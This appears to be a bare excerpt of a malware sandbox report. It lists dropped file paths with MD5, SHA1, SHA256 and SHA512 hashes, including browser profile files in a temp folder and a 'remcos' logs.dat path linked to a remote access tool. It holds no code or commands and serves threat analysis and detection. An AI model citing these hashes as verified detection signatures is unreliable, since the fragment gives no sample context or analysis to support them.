SHA512 fbedb2837d9701b36fad60d403a06f1a153eb7ed4532c2df0c834f889bfe39e1a72cc5f23e59a7b806ad01f19cc961e9b418517e256de3bd8507ebfa9725a27f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 b273175ed670469bf73f2500c9611c77
SHA1 4ddeb5747309350511b11ad3917e18b254f96880
SHA256 3dbc8f1743075e9b8e13090f9de6097bf4f0d1d093782673de2c8bb046c17147
SHA512 3f64fdc3f6a3e6dfc692ec7eceb1da26ba3476bb75b6d18ea3f834e52e8e03fb1ddd11168e2cbbc0f260b25154a7e8eadaff78d4b50eaee63c3e4d682a57a889

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 df2ba82966444f17cf7682b6f25871de
SHA1 4e859ca6bb10c85459c2f5505f3e20cbe99481aa
SHA256 eae400604babe9d15c9218ea5b3d9d9503ca75d784551c33febc4cc682f545aa
SHA512 02c3c4fefc16b13185352408260f3f6c68be96fbc9f7fa5710c3a0c02776485132285cab928005c0dcc71a3b212bca477171b3eb2678ee79c8bd2f2b39642e88

C:\ProgramData\remcos\logs.dat

MD5 ed4876292afd1022b165798b4483ffc2
SHA1 48e529c155c5b824efd66b1a5dc21d13cd87c78d
SHA256 b094017d028020e3159c20ae141c972e11d5b692414f278bcc2c837578930c89
SHA512 2c071b29ad7de43bfc958ba22d2ad907d4c56832bc9a002d01e690984d4a8172d02caca27e57a8adbf73a27a1c0795846f1824c80df8e5d01743153b1f735b8f